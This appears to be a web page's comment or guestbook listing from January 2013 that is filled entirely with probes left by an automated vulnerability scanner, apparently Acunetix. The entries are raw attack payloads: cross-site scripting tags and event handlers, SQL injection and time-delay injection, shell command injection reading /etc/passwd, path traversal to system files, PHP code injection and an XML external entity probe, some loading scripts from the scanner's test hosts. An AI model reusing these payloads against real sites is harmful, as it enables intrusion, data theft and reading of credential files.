\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
# 1 on 22 January 2013 at 23:41:

'"()&%1<ScRiPt >prompt(956620)</ScRiPt>
# 1 on 22 January 2013 at 23:41:

OTgwMjE3
# 1 on 22 January 2013 at 23:41:

undefined1<ScRiPt >prompt(961872)</ScRiPt>
# 1 on 22 January 2013 at 23:41:

1<ScRiPt
>prompt(961343)</ScRiPt>
# 1 on 22 January 2013 at 23:41:

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935120></ScRiPt>
# 1 on 22 January 2013 at 23:41:

1<ScRiPt
>prompt(902412)</ScRiPt>
# 1 on 22 January 2013 at 23:41:

<video><source onerror="javascript:prompt(987609)">
# 1 on 22 January 2013 at 23:42:

<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996395)"></g></svg>
# 1 on 22 January 2013 at 23:42:

1[url=javascript:prompt(983709)]http://www.acunetix.com[/url]
# 1 on 22 January 2013 at 23:42:

1<div style=width:expression(prompt(925651))>
# 1 on 22 January 2013 at 23:42:

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='901562'>
# 1 on 22 January 2013 at 23:42:

<body onload=prompt(971632)>
# 1 on 22 January 2013 at 23:42:

<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900122)>
# 1 on 22 January 2013 at 23:42:

<img src=xyz OnErRor=prompt(950299)>
# 1 on 22 January 2013 at 23:42:

1%3CScRiPt%20%3Eprompt(968852)%3C/sCripT%3E
# 1 on 22 January 2013 at 23:42:
# 1 on 22 January 2013 at 23:42:

<input autofocus onfocus=prompt(928329)>
# 1 on 22 January 2013 at 23:42:

1PWiq
1<ScRiPt >prompt(927115)</ScRiPt>
# 1 on 23 January 2013 at 7:10:

1
# response.write(9601431*9657305) on 23 January 2013 at 13:42:

1
# 1 on 23 January 2013 at 13:42:

1
# 1 on 23 January 2013 at 13:42:

1
# &cat /etc/passwd& on 23 January 2013 at 13:42:

1
# -1 or 70=70 on 23 January 2013 at 13:42:

1
# '+response.write(9601431*9657305)+' on 23 January 2013 at 13:42:

1
# -1 or 70=0 on 23 January 2013 at 13:42:

1
# '&cat /etc/passwd&' on 23 January 2013 at 13:42:

1
# "+response.write(9601431*9657305)+" on 23 January 2013 at 13:42:

1
# -1' or '86'='86 on 23 January 2013 at 13:42:

1
# "&cat /etc/passwd&" on 23 January 2013 at 13:42:

1
# SomeCustomInjectedHeader:injected_by_wvs on 23 January 2013 at 13:42:

1
# -1' or '86'='0 on 23 January 2013 at 13:42:

1
# cat /etc/passwd on 23 January 2013 at 13:42:

1
# SomeCustomInjectedHeader:injected_by_wvs on 23 January 2013 at 13:42:

1
# -1" or "58"="58 on 23 January 2013 at 13:42:

1
# ../../../../../../../../../../etc/passwd on 23 January 2013 at 13:42:

1
# SomeCustomInjectedHeader:injected_by_wvs on 23 January 2013 at 13:43:

1
# -1" or "58"="0 on 23 January 2013 at 13:43:

1
# ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 23 January 2013 at 13:43:

1
# `cat /etc/passwd` on 23 January 2013 at 13:43:

1
# ../../../../../../../../../../etc/passwd.jpg on 23 January 2013 at 13:43:

1
# 1 and sleep(4) on 23 January 2013 at 13:43:

1
# |cat /etc/passwd# on 23 January 2013 at 13:43:

1
# Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n on 23 January 2013 at 13:43:

1
# '|'ld on 23 January 2013 at 13:43:

1
# "|"ld on 23 January 2013 at 13:43:

1
# ;cat /etc/passwd; on 23 January 2013 at 13:43:

1
# ';cat /etc/passwd;' on 23 January 2013 at 13:43:

1
# ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 23 January 2013 at 13:43:

1
# 1 or (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:43:

1
# ";cat /etc/passwd;" on 23 January 2013 at 13:43:

1
# ||cat /etc/passwd on 23 January 2013 at 13:43:

1
# &dir on 23 January 2013 at 13:43:

1
# '&dir&' on 23 January 2013 at 13:43:

1
# 1' and sleep(4)=' on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

response.write(9206505*9874376)
# "&dir&" on 23 January 2013 at 13:43:

1
# /../..//../..//../..//../..//../..//etc/passwd.jpg on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

'+response.write(9206505*9874376)+'
# 1 on 23 January 2013 at 13:43:

1
# 1' and (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:43:

1
# .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd on 23 January 2013 at 13:43:

1
# 1" and sleep(4)=" on 23 January 2013 at 13:43:

1
# /etc/passwd on 23 January 2013 at 13:43:

1
# |dir on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

"+response.write(9206505*9874376)+"
# 1' or (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:43:

1
# ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd on 23 January 2013 at 13:43:

1
# 1" or (sleep(4)+1) limit 1 -- on 23 January 2013 at 13:43:

1
# '|dir on 23 January 2013 at 13:43:

1
# ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd on 23 January 2013 at 13:43:

1
# 1'=sleep(4)=' on 23 January 2013 at 13:43:

1
# .. on 23 January 2013 at 13:43:

1
# "|dir on 23 January 2013 at 13:43:

1
# 1"=sleep(4)=" on 23 January 2013 at 13:43:

1
# invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././ on 23 January 2013 at 13:43:

1
# 1;select pg_sleep(4); -- on 23 January 2013 at 13:43:

1
# ${99106+99415} on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

SomeCustomInjectedHeader:injected_by_wvs
# file:///etc/passwd on 23 January 2013 at 13:43:

1
# 268435455 on 23 January 2013 at 13:43:

1
# /\../\../\../\../\../\../\../etc/passwd on 23 January 2013 at 13:43:

1
# on 23 January 2013 at 13:43:

1
# ../../../../../../../../../../windows/win.ini on 23 January 2013 at 13:43:

1
# 1';select pg_sleep(4); -- on 23 January 2013 at 13:43:

1
# ../../../../../../../../../../boot.ini on 23 January 2013 at 13:43:

1
# .. on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

SomeCustomInjectedHeader:injected_by_wvs
# 1; waitfor delay '0:0:4' -- on 23 January 2013 at 13:43:

1
# 1e309 on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

${99112+99579}
# 1'; waitfor delay '0:0:4' -- on 23 January 2013 at 13:43:

1
# '"\'\");|]*{ <> on 23 January 2013 at 13:43:

1
# http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg on 23 January 2013 at 13:43:

1
# 1"; waitfor delay '0:0:4' -- on 23 January 2013 at 13:43:

1
# Array on 23 January 2013 at 13:43:

1
# 1some_inexistent_file_with_long_name%00.jpg on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

1
# http://testasp.vulnweb.com/t/fit.txt?%00.jpg on 23 January 2013 at 13:43:

1
# ../../../../../../../../../../windows/win.ini.jpg on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

SomeCustomInjectedHeader:injected_by_wvs
# on 23 January 2013 at 13:43:

1
# ) on 23 January 2013 at 13:43:

1
# ................windowswin.ini on 23 January 2013 at 13:43:

1
# 1&n980999=v994378 on 23 January 2013 at 13:43:

1
# !(()&&!|*|*| on 23 January 2013 at 13:43:

1
# ^(#$!@#$)(()))****** on 23 January 2013 at 13:43:

1
# ..\..\..\..\..\..\..\..\windows\win.ini on 23 January 2013 at 13:43:

1
# /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini on 23 January 2013 at 13:43:

1
# ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini on 23 January 2013 at 13:43:

1
# ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
# unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

1some_inexistent_file_with_long_name%00.jpg
# 1 on 23 January 2013 at 13:43:

http://testasp.vulnweb.com/t/fit.txt?%00.jpg
# Array on 23 January 2013 at 13:43:

1
# '"() on 23 January 2013 at 13:43:

1
# ;print(md5(acunetix_wvs_security_test)); on 23 January 2013 at 13:43:

1
# ';print(md5(acunetix_wvs_security_test));$a=' on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

1&n915084=v980278
# 1 on 23 January 2013 at 13:43:

)
# ";print(md5(acunetix_wvs_security_test));$a=" on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

!(()&&!|*|*|
# ${@print(md5(acunetix_wvs_security_test))} on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

^(#$!@#$)(()))******
# http://testasp.vulnweb.com/t/xss.html?%00.jpg on 23 January 2013 at 13:43:

1
# ${@print(md5(acunetix_wvs_security_test))}\ on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

1
# acunetix_wvs_invalid_filename on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

Array
# 6443 on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

'"()
# 6443 on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

1
# 1'" on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

http://testasp.vulnweb.com/t/xss.html?%00.jpg
# 1 on 23 January 2013 at 13:43:

268435455
# \ on 23 January 2013 at 13:43:

1
# 6443/. on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:
# 1Axa7Ac on 23 January 2013 at 13:43:

1
# ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) on 23 January 2013 at 13:43:

1
# 1 on 23 January 2013 at 13:43:

..
# //www.acunetix.tst on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
# <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif"> ]> <xxx>&acunetixe on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1e309
# '" on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

'"\'\");|]*{
<>
# 1 on 23 January 2013 at 13:44:

Array
# 1 on 23 January 2013 at 13:44:

//www.acunetix.tst
# '"()&%1<ScRiPt >prompt(924811)</ScRiPt> on 23 January 2013 at 13:44:

1
# <!-- on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
<!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif">
]>
<xxx>&acunetixent;</xxx>
# 1 on 23 January 2013 at 13:44:

;print(md5(acunetix_wvs_security_test));
# @@mlGiu on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

';print(md5(acunetix_wvs_security_test));$a='
# OTczNTQ5 on 23 January 2013 at 13:44:

1
# JyI= on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

";print(md5(acunetix_wvs_security_test));$a="
# 1 on 23 January 2013 at 13:44:

'"
# ?'?" on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1
# ?''?"" on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

-1 or 56=56
# 1 on 23 January 2013 at 13:44:

${@print(md5(acunetix_wvs_security_test))}
# 1 on 23 January 2013 at 13:44:

<!--
# 1 on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

${@print(md5(acunetix_wvs_security_test))}\
# 1 on 23 January 2013 at 13:44:

acunetix_wvs_invalid_filename
# undefined1<ScRiPt >prompt(991879)</ScRiPt> on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

6443
# 1 on 23 January 2013 at 13:44:

-1 or 56=0
# 1 on 23 January 2013 at 13:44:

6443
# 1 on 23 January 2013 at 13:44:

-1' or '28'='28
# 1 on 23 January 2013 at 13:44:

&cat /etc/passwd&
# 1 on 23 January 2013 at 13:44:

-1' or '28'='0
# 1 on 23 January 2013 at 13:44:

'&cat /etc/passwd&'
# 1 on 23 January 2013 at 13:44:

-1" or "91"="91
# 1<ScRiPt >prompt(969336)</ScRiPt> on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

6443/.
# 1 on 23 January 2013 at 13:44:

"&cat /etc/passwd&"
# 1 on 23 January 2013 at 13:44:

-1" or "91"="0
# 1 on 23 January 2013 at 13:44:

cat /etc/passwd
# 1 on 23 January 2013 at 13:44:

1 and sleep(4)
# 1 on 23 January 2013 at 13:44:

`cat /etc/passwd`
# 1 on 23 January 2013 at 13:44:

|cat /etc/passwd#
# 1 on 23 January 2013 at 13:44:

1 or (sleep(4)+1) limit 1 --
# 1 on 23 January 2013 at 13:44:

'|'ld
# 1 on 23 January 2013 at 13:44:

"|"ld
# 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931223></ScRiPt> on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1' and sleep(4)='
# 1 on 23 January 2013 at 13:44:

;cat /etc/passwd;
# 1 on 23 January 2013 at 13:44:

1' and (sleep(4)+1) limit 1 --
# 1 on 23 January 2013 at 13:44:

';cat /etc/passwd;'
# 1 on 23 January 2013 at 13:44:

1" and sleep(4)="
# 1 on 23 January 2013 at 13:44:

";cat /etc/passwd;"
# 1 on 23 January 2013 at 13:44:

1' or (sleep(4)+1) limit 1 --
# 1 on 23 January 2013 at 13:44:

||cat /etc/passwd
# 1 on 23 January 2013 at 13:44:

1" or (sleep(4)+1) limit 1 --
# 1 on 23 January 2013 at 13:44:

1'=sleep(4)='
# 1 on 23 January 2013 at 13:44:

&dir
# 1<ScRiPt >prompt(943950)</ScRiPt> on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1"=sleep(4)="
# 1 on 23 January 2013 at 13:44:

1;select pg_sleep(4); --
# 1 on 23 January 2013 at 13:44:

'&dir&'
# 1 on 23 January 2013 at 13:44:

"&dir&"
# <video><source onerror="javascript:prompt(945037)"> on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

|dir
# 1 on 23 January 2013 at 13:44:

'|dir
# 1 on 23 January 2013 at 13:44:

1';select pg_sleep(4); --
# 1 on 23 January 2013 at 13:44:

"|dir
# 1 on 23 January 2013 at 13:44:

1; waitfor delay '0:0:4' --
# 1 on 23 January 2013 at 13:44:

1'; waitfor delay '0:0:4' --
# 1 on 23 January 2013 at 13:44:

1"; waitfor delay '0:0:4' --
# <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922763)"></g></svg> on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:44:

1'"
# 1[url=javascript:prompt(987160)]http://www.acunetix.com[/url] on 23 January 2013 at 13:44:

1
# 1 on 23 January 2013 at 13:45:

\
# 1<div style=width:expression(prompt(961128))> on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:

1Axa7Ac
# 1 on 23 January 2013 at 13:45:

@@G4jMO
# 1 on 23 January 2013 at 13:45:

JyI=
# 1 on 23 January 2013 at 13:45:

?'?"
# 1 on 23 January 2013 at 13:45:

?''?""
# <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='926681'> on 23 January 2013 at 13:45:

1
# <body onload=prompt(999804)> on 23 January 2013 at 13:45:

1
# <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986447)> on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:

../../../../../../../../../../etc/passwd
# 1 on 23 January 2013 at 13:45:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
# 1 on 23 January 2013 at 13:45:

../../../../../../../../../../etc/passwd.jpg
# 1 on 23 January 2013 at 13:45:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
# <img src=xyz OnErRor=prompt(970777)> on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
# 1 on 23 January 2013 at 13:45:

/../..//../..//../..//../..//../..//etc/passwd.jpg
# 1 on 23 January 2013 at 13:45:

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
# 1 on 23 January 2013 at 13:45:

/etc/passwd
# 1 on 23 January 2013 at 13:45:

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
# 1 on 23 January 2013 at 13:45:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
# 1%3CScRiPt%20%3Eprompt(947895)%3C/sCripT%3E on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:

..
# 1 on 23 January 2013 at 13:45:

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
# 1 on 23 January 2013 at 13:45:

file:///etc/passwd
# on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:

/\../\../\../\../\../\../\../etc/passwd
# 1 on 23 January 2013 at 13:45:

../../../../../../../../../../windows/win.ini
# <input autofocus onfocus=prompt(939576)> on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:

../../../../../../../../../../boot.ini
# 1 on 23 January 2013 at 13:45:

../../../../../../../../../../windows/win.ini.jpg
# TAIHv 1<ScRiPt >prompt(926334)</ScRiPt> on 23 January 2013 at 13:45:

1
# 1 on 23 January 2013 at 13:45:
# 1 on 23 January 2013 at 13:45:

................windowswin.ini
# 1 on 23 January 2013 at 13:45:

..\..\..\..\..\..\..\..\windows\win.ini
# 1 on 23 January 2013 at 13:45:

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
# 1 on 23 January 2013 at 13:45:

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
# 1 on 23 January 2013 at 13:45:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
# 1 on 23 January 2013 at 13:45:

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.